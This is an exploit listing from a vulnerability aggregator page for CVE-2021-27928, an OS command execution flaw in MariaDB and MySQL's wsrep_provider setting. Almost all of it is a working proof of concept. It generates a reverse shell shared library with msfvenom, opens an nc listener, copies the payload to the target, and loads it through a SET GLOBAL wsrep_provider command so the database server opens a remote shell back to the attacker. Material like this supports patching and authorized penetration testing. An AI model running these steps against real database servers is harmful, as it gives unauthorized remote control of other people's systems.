Exploit for MariaDB 10.2 Command Execution CVE-2021-27928

Name: Exploit for MariaDB 10.2 Command Execution CVE-2021-27928
Rating: 5 (635 reviews)

2021-04-14 | CVSS 9.0

## https://sploitus.com/exploit?id=PACKETSTORM:162177
# Exploit Title: MariaDB 10.2 /MySQL - 'wsrep_provider' OS Command Execution  
# Date: 03/18/2021  
# Exploit Author: Central InfoSec  
# Version: MariaDB 10.2 before 10.2.37, 10.3 before 10.3.28, 10.4 before 10.4.18, and 10.5 before 10.5.9; Percona Server through 2021-03-03; and the wsrep patch through 2021-03-03 for MySQL  
# Tested on: Linux  
# CVE : CVE-2021-27928  
  
# Proof of Concept:  
  
# Create the reverse shell payload  
msfvenom -p linux/x64/shell_reverse_tcp LHOST=<ip> LPORT=<port> -f elf-so -o CVE-2021-27928.so  
  
# Start a listener  
nc -lvp <port>  
  
# Copy the payload to the target machine (In this example, SCP/SSH is used)  
scp CVE-2021-27928.so <user>@<ip>:/tmp/CVE-2021-27928.so  
  
# Execute the payload  
mysql -u <user> -p -h <ip> -e 'SET GLOBAL wsrep_provider="/tmp/CVE-2021-27928.so";'